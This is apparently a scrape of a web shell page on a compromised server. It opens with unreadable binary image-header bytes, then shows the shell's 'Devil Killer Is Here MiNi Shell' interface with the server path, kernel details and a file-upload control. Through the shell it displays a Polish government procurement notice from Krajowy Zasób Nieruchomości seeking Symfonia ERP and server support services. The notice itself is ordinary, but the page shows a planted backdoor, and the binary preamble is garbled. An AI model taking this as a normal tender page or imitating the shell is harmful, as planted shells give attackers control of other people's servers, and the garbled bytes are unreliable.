JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240409/0027656201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> CZĘŚĆ I - USŁUGA WSPARCIA SYSTEMU FINANSOWO – KSIĘGOWEGO: SYMFONIA ERP WRAZ Z DOSTARCZENIEM LICENCJI<br/>CZĘŚĆ II - ZAKUP USŁUG SPECJALISTYCZNEGO WSPARCIA TECH. DLA OBSŁUGI SERWERÓW W LOK. SERWEROWNI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Zasób Nieruchomości.</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368112343</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowy Świat 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-029</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kzn.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.kzn.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Nieruchomości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> CZĘŚĆ I - USŁUGA WSPARCIA SYSTEMU FINANSOWO – KSIĘGOWEGO: SYMFONIA ERP WRAZ Z DOSTARCZENIEM LICENCJI<br/>CZĘŚĆ II - ZAKUP USŁUG SPECJALISTYCZNEGO WSPARCIA TECH. DLA OBSŁUGI SERWERÓW W LOK. SERWEROWNI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2afba7b3-f59d-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00276562</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00061743/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Usługi wsparcia technicznego</p> <p class="mb-0">1.3.8 Usługi informatyczne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/kzn/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/kzn/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem:<br/>- poczty e-mail: przetargi@kzn.gov.pl<br/>oraz<br/>- platformy zakupowej pod adresem https://portal.smartpzp.pl/kzn/ zwanej dalej Platformą.<br/>Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1<br/>niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający opisał szczegółowo wymogi określone w Rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, w treści SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający opisał szczegółowo wymogi określone w Rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, w treści SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DO-ZP.260.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 166000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1<br/>1. Przedmiotem usługi wsparcia będą następujące elementy Systemu Symfonia ERP:<br/>a) Symfonia Finanse i Księgowość ERP poziom profesjonalny, subskrypcja na okres 12 – 4 stanowiska;<br/>b) Symfonia Handel ERP poziom profesjonalny, subskrypcja na okres 12 miesięcy – 1 stanowisko;<br/>c) Business Intelligence, subskrypcja na okres 12 (lub 24 miesięcy) (do 5 stanowisk).<br/>Zamawiający informuje, że posiada zbudowane przez dotychczasowego wykonawcę rozwiązania indywidualne, które należy obsługiwać i aktualizować.<br/>2. Wsparcie techniczne w użytkowaniu w/w programów polegać będzie na zapewnieniu gotowości w:<br/>a)	bieżącej instalacji uaktualnień w/w programów, <br/>b)	udzielaniu konsultacji z zakresu eksploatacji w/w programów, realizowanych do wyboru: stacjonarnie, online lub telefonicznie – w zależności od potrzeb Zamawiającego;<br/>c)	świadczeniu na życzenie Zamawiającego dodatkowych usług związanych z eksploatacją w/w programów w tym dodatkowych szkoleń, o ile zajdzie taka potrzeba.<br/>3.	Warunki, okres i terminy świadczenia usług:<br/>a)	Zamawiający wymaga, aby:<br/>- usługa wsparcia była realizowana sukcesywnie począwszy od dnia podpisania umowy przez okres 12 miesięcy. Tym samym Zamawiający zakłada, że okres obowiązywania umowy w sprawie przedmiotowego zamówienia wyniesie 12 miesięcy, przy czym zastrzega, że wraz z udzieleniem zamówienia okres ten może się nieznacznie zmienić gdyż jest uzależniony od czasu trwania / daty zakończenia przedmiotowego postępowania;<br/>- orientacyjna czasochłonność usługi wyniesie maksymalnie 240 godzin w czasie trwania umowy, przy czym niewykorzystane w danym miesiącu godziny Zamawiający może wykorzystać w kolejnych miesiącach. <br/>- sługa będzie realizowana zarówno zdalnie jak i stacjonarnie (przyjmuje się, że 10 godzin w miesiącu będzie realizowane w biurze KZN). Tym samym Wykonawca oświadcza, że osoba delegowana / osoby delegowane do realizacji usługi pozostaje pozostają do dyspozycji Zamawiającego w związku z realizacją przedmiotowej usługi, przez cały okres obwiązywania umowy.<br/>- Zamawiający wymaga usługi wsparcia systemu Symfonia ERP, którego licencje zakupił. Zamawiający nie dopuszcza zaoferowana usługi wsparcia innego systemu finansowo-księgowego nawet z opcją uzyskania bezpłatnej licencji na taki system;<br/>- Wykonawca posiadał autoryzację producenta systemu Symfonia ERP lub upoważnionego podmiotu;<br/>- usługa wsparcia nie może prowadzić czy narazić Zamawiającego na ryzyko utraty gwarancji producenta;<br/>- Wykonawca ponosi wszelkie ewentualne koszty związane z uzyskaniem praw do świadczenia przedmiotowej usługi od producenta systemu Symfonia ERP.<br/>b) Wraz ze złożeniem oferty Wykonawca oświadcza, że posiada wszelkie niezbędne prawa autorskie do realizacji przedmiotu umowy – bez żadnych ograniczeń na rzecz osób trzecich, a wykonanie przez niego przedmiotu umowy nie narusza praw osób trzecich wynikających z ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych.<br/>c) Najpóźniej w dniu zawarcia umowy (ale przed jej podpisaniem) Wykonawca przedłoży Zamawiającemu do wglądu dokumenty potwierdzające autoryzację producenta systemu Symfonia ERP lub upoważnionego podmiotu, dotyczącą uprawnienia do świadczenia usług serwisowych w zakresie całego oprogramowania określonego w SWZ (w przypadku zatrudnienia do świadczenia ww. usług Podwykonawcy – muszą być to dokumenty potwierdzające ww. autoryzację tego Podwykonawcy).<br/>d)	Usługa opisana w poz. 1 Formularza cenowego ma charakter ryczałtowy (tj. Zamawiający ponosi stały ryczałt za tzw. gotowość), podobnie usługa w zakresie poz. 2 Formularza cenowego gdzie Zamawiający płaci sukcesywnie stały koszt miesięczny za dostarczenie licencji.<br/>Szczegółowe informację wraz z przewidywaną liczbą godzin świadczenia usługi wsparcia zostały określone w Formularzy oferty (i w Formularzu cenowym).<br/>e)	Standardowy czas realizacji konsultacji nie przekroczy 5 dni roboczych, z wyjątkiem czasu realizacji tzw. zadań/zdarzeń krytycznych, który zostanie wyznaczony w oparciu o czas zadeklarowany w treści oferty Wykonawcy (kryterium oceny ofert). Pod pojęciem dni roboczych strony rozumieją dni powszednie od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy w godz. 9.00-15.00. Czas realizacji jest liczony od momentu zgłoszenia przekazanego przez Przedstawiciela Zamawiającego pocztą elektroniczną na dres e-mail (do obsługi zgłoszeń) wskazany przez Wykonawcę.<br/>f)	Do zadań / zdarzeń krytycznych należy zaliczyć:<br/>- terminowe wysłanie deklaracji VAT w formie JPK do US;<br/>- terminowe wygenerowanie zestawienia obrotów i sald na koniec każdego kwartału w celu przygotowania sprawozdania z wykonania planu finansowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 46000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48218000-9 - Pakiety oprogramowania zarządzającego licencjami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji konsultacji zadań krytycznych (Czas)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2<br/>1.	Przedmiotem zapytania jest:<br/>ustalenie wartości zamówienia polegającego na zapewnieniu wsparcia technicznego infrastruktury IT Krajowego Zasobu Nieruchomości (KZN) wraz ze wsparciem przy planowanej migracji całego środowiska na nową platformę wirtualizacyjną, realizowanego zgodnie z wymaganiami określonymi w niniejszym Zapytaniu przez okres 12 miesięcy od dnia zawarcia umowy.<br/>2.	Szacowana czasochłonność usługi:<br/>Orientacyjna czasochłonność usługi wyniesie maksymalnie 240 godzin w czasie trwania umowy, przy czym niewykorzystane w danym miesiącu godziny Zamawiający może wykorzystać w kolejnych miesiącach. <br/>3.	Miejsce świadczenia usługi: <br/>Usługa będzie realizowana zarówno zdalnie jak i stacjonarnie (przyjmuje się, że 10 godzin w miesiącu będzie realizowane w biurze KZN). Tym samym Wykonawca oświadcza, że osoba delegowana / osoby delegowane do realizacji usługi pozostaje pozostają do dyspozycji Zamawiającego w związku z realizacją przedmiotowej usługi, przez cały okres obwiązywania umowy.<br/>4.	Opis środowiska IT Zamawiającego:<br/>Zamawiający posiada całkowicie zwirtualizowane środowisko IT, w oparciu o system MS Windows Server 2019 DataCenter, z wirtualizatorem Hyper-V. Na bazie tego środowiska uruchomionych jest ponad 30 serwerów wirtualnych (MS Windows 2019, MS Exchange-DAG, Linux, MS SQL, PostgresSQL, mySQL, DesktopCentral, SolarWinds, VEEAM). Planowany jest dalszy rozwój środowiska a ilość wirtualnych serwerów przekroczy 50 szt. Środowisko jest rozdzielone na kilka v-LAN’ów.<br/>Systemy krytyczne (poziom wysoki) w środowisku: <br/>a)	Serwery Hyper-V Windows 2019 – cluster<br/>b)	MS Active Directory<br/>c)	MS Exchange Serwer 2019 – DAG <br/>d)	Zevenet Load Balancer Debian – cluster <br/>e)	MS Exchange Server EDGE 2019<br/>f)	MenageEngine - Central Desktop / Application Manager / ExchangeReporter<br/>g)	MS SQL Serwer 2019 / 2017 / 2014<br/>h)	Veeam 11 B&amp;R Enterprise Server - jako system kopii zapasowych (backup)<br/>i)	SolarWinds - SEM / NPM<br/>j)	serwery WWW – Debian <br/>k)	Serwer Wydruku<br/>oraz systemy wspomagające rozwiązania dziedzinowe ( EZD PUW, VPN, Dispatcher Paragon - oprogramowanie serwerowe / wydruk podążający, VoIP, itp.).<br/>5.	Szczegółowy zakres usługi:<br/>W ramach umowy wykonawca zobowiązany będzie w szczególności do realizacji następujących prac:<br/>a)	administracja systemami informatycznymi IT w KZN, lokalnie lub zdalnie,<br/>b)	zapewnienie wysokiej dostępności i ciągłości pracy systemów IT, dbanie o ich aktualizacje i bezpieczeństwo,<br/>c)	w przypadku dysfunkcjonalności któregokolwiek systemu IT (producenta MS) wykonywanie w trybie niezwłocznym jak najszybszego przywrócenia systemów do pracy,<br/>d)	rozwijanie oraz instalowanie zabezpieczeń systemów informatycznych, zgodnie z panującymi trendami,<br/>e)	uruchamianie nowych (lub niezbędnych) funkcjonalności systemowych zgodnie z potrzebami KZN i zleceniami odgórnymi,<br/>f)	zapewnienie wysokiej integralności danych w ramach systemów ochrony i bezpieczeństwa,<br/>g)	uczestnictwo w ramach prowadzonych postępowań dotyczących IT wraz z wykluczeniem możliwości brania w nich udziału,<br/>h)	comiesięcznej aktualizacji środowiska, w tym kompleksowy audyt środowiska<br/>i)	rozwiązywania problemów zgłoszonych przez użytkowników na poziomie linii wsparcia drugiej oraz trzeciej,<br/>j)	Wsparcie 1 linii dla systemów macOS. <br/><br/>W ramach przedmiotowej usługi mogą również zostać zlecone inne zadania, poza wskazanymi powyżej będą one jednak mieścić się w kategorii usługi wsparcia technicznego infrastruktury IT.<br/>6.	Czasy reakcji:<br/>Wymagane SLA – 4 godz./reakcja a 8 godz./naprawa skuteczna ( przywrócenie możliwości pracy biura, dopuszczany jest workaround przy uzgodnienie z IT KZN), potwierdzona protokołem Z/O.<br/>Wymagane SLA dotyczy integralności systemów i ich spójnej pracy. Ewentualne awarie sprzętu, elementów serwerowni nie dotyczą tego poziomu SLA. <br/>Uwaga: W przypadku niewykonania zleconych przez Zamawiającego prac w czasie określonym powyżej, Zamawiający może zlecić te prace innemu Wykonawcy, a kosztami obciążyć Wykonawcę. <br/>7.	Wynagrodzenie:<br/>Wynagrodzenie za wykonanie usługi będzie miało charakter ryczałtowy (stały ryczałt miesięczny, za zastrzeżeniem postanowień o których mowa w niniejszym OPZ). Wynagrodzenie będzie płatne sukcesywnie na koniec każdego miesiąca realizacji usługi. Uwaga: wynagrodzenie obejmuje wszystkie koszty związane z realizacją usługi. Zamawiający nie przewiduje dokonywania żadnych odrębnych płatności z tytułu poniesionych przez Wykonawcę kosztów np. kosztów zakupu oprogramowania czy też narzędzi niezbędnych do realizacji usługi lub też kosztów przejazdów, biletów, opłat za parking czy nocleg itp. w sytuacji konieczności realizacji usługi stacjonarnie.<br/>8.	Informacje dot. wymagań technicznych:<br/>Wykonawca składając ofertę, jednocześnie oświadcza że posiada niezbędne narzędzia i oprogramowanie umożliwiające realizację usługi. <br/>9. Pozostałe informacje:<br/>Pozostałe informacje dotyczące przedmiotowej usługi w tym warunki jej realizacji precyzuje Załącznik nr 2 do niniejszego SWZ. Umowa nie będzie miała charakteru umowy o pracę. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 120000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71356300-1 - Usługi wsparcia technicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby / osób delegowanej/nych do realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 